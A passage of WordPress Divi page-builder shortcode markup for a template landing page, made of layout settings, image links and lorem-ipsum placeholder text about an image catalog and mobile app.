button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_margin=\"20%||20%|\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06_m.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||104px|\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"160px||160px|\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Header #5\" title=\"Great images should be shared.\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"off|off|off\" disabled=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"The Product\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\" text_letter_spacing=\"-1px\"]\r\n\r\n<p>The Product</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Millions of high-quality images and videos.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Millions of high-quality<br /> images and videos.</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px|||\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"40px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/023.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||104px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Easy navigation</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Large catalog</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Free upgrade</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Find quick</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit. Aenean como ligula etla.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" background_color_1=\"#ffffff\" custom_padding=\"104px||0px|\" disabled=\"off\" disabled_on=\"on|on|\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Laptop Mock-up\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03-03.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"right\" sticky=\"off\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin_tablet=\"0px|||\" custom_margin_last_edited=\"on|desktop\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"1\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" background_color_1=\"#ffffff\" custom_padding_tablet=\"104px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Technology\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\" max_width=\"540px\" custom_margin=\"-520px||10px|\" custom_margin_last_edited=\"on|phone\" custom_margin_tablet=\"0px||10px|\"]\r\n\r\n<p>Technology</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"All you need is a browser.\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\" max_width=\"540px\" custom_margin=\"20px|||\"]\r\n\r\n<p>All you need is a browser.</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"18px||32px|\" custom_css_main_element=\"font-weight: 300;\" max_width=\"540px\"]\r\n\r\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\r\n\r\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" button_alignment=\"left\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"15\" button_text_color=\"#ffffff\" button_bg_color=\"#1fbacd\" button_border_width=\"13\" button_border_color=\"#1fbacd\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#1fbacd\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\"]\r\n\r\n\r\n\r\n[/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" background_color_1=\"#ffffff\" custom_padding=\"84px||0px|\" disabled=\"off\" disabled_on=\"||on\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03-03.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"right\" sticky=\"off\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin_tablet=\"0px|||\" custom_margin_last_edited=\"on|desktop\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"90px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#d7dce1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"4px||90px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/042.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Find quick</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_02.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Jump start</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_03.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Make it amazing</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5d666a\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/bg_gradient1.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Mobile App\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#96cbd6\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n<p>Mobile App</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Magical Device Balance.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Magical Device Balance.</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#c1e1e7\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px|||\" custom_css_main_element=\"font-weight: 300;\"]\r\n\r\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"60px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"34\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\" disabled=\"off\" disabled_on=\"off|on|on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>It\'s a title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\r\n\r\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\" disabled=\"off\" disabled_on=\"on||\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"14\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>It\'s a title</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"16\" text_text_color=\"#add8e0\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"22px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, coner est adipiscing au elit.</p>\r\n\r\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"54\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"14\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" disabled=\"off\" disabled_on=\"off|on|on\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" disabled=\"off\" disabled_on=\"on||\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"right\" text_font=\"Roboto||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 